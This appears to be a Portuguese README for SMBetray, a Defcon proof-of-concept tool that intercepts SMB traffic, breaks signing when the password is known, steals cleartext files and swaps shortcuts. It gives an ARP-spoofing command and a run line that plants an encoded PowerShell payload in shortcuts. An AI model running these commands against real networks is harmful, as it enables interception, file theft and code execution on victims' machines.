
Ferramenta SMB MiTM com foco em atacar clientes através da troca de conteúdo de arquivos, troca de atalhos (.lnk), bem como comprometer quaisquer dados transmitidos em texto claro pela rede.
Versão 1.0.0. Esta ferramenta é uma Prova de Conceito (PoC) para demonstrar a capacidade de um invasor interceptar e modificar conexões SMB inseguras, bem como comprometer algumas conexões SMB seguras se as credenciais forem conhecidas.
Lançado na Defcon26 em "SMBetray - Backdooring and Breaking Signatures"
Em conexões SMB, os mecanismos de segurança que protegem a integridade dos dados transmitidos entre o servidor e o cliente são a assinatura (signing) e a criptografia. As assinaturas nos pacotes SMB, quando a assinatura está habilitada, são baseadas em chaves derivadas de informações enviadas pela rede em texto claro durante a fase de autenticação, além da senha do usuário. Se a senha do usuário for conhecida, um invasor pode recriar a SessionBaseKey e todas as outras chaves SMB e usá-las para modificar pacotes SMB e re-assiná-los, fazendo com que sejam tratados como pacotes válidos e legítimos pelo servidor e pelo cliente. Além disso, a assinatura está desabilitada por padrão na maioria dos sistemas, exceto nos controladores de domínio, portanto a necessidade de quebrar as assinaturas é rara.
O objetivo desta ferramenta é mudar o foco do MiTM em SMB de atacar o servidor por meio de conexões retransmitidas (relay) para atacar o cliente através de arquivos maliciosos e dados com backdoor/substituídos quando a oportunidade surgir. Finalmente, como a criptografia raramente é usada, no mínimo esta ferramenta permite o roubo de arquivos transmitidos em texto claro pela rede — o que pode ser útil para enumeração de sistemas, ou prejudicial se os dados interceptados forem de natureza sensível (PCI, PII, etc.).
Mais informações e demonstrações podem ser encontradas aqui: https://blog.quickbreach.io/smbetray-backdooring-and-breaking-signatures/
Requer um sistema que use iptables
sudo bash install.sh
Primeiro, execute um ataque bidirecional de envenenamento de cache ARP entre a vítima e seu gateway ou compartilhamentos de rede de destino, por exemplo:
sudo arpspoof -i <iface> -c both -t <target_ip> -r <gateway_ip>
Em seguida, execute o smbetray com alguns módulos de ataque:
sudo ./smbetray.py --passive ./StolenFilesFolder --lnkSwapAll "powershell -noP -sta -w 1 -enc AABCAD....(etc)" -I eth0
Uma demonstração da ferramenta pode ser encontrada aqui: https://blog.quickbreach.io/smbetray-backdooring-and-breaking-signatures/
Mais informações serão fornecidas — atualmente a ferramenta não suporta conexões exclusivas SMBv1, o que não é um problema 99% das vezes. O código é feio, mas tem uma ótima personalidade.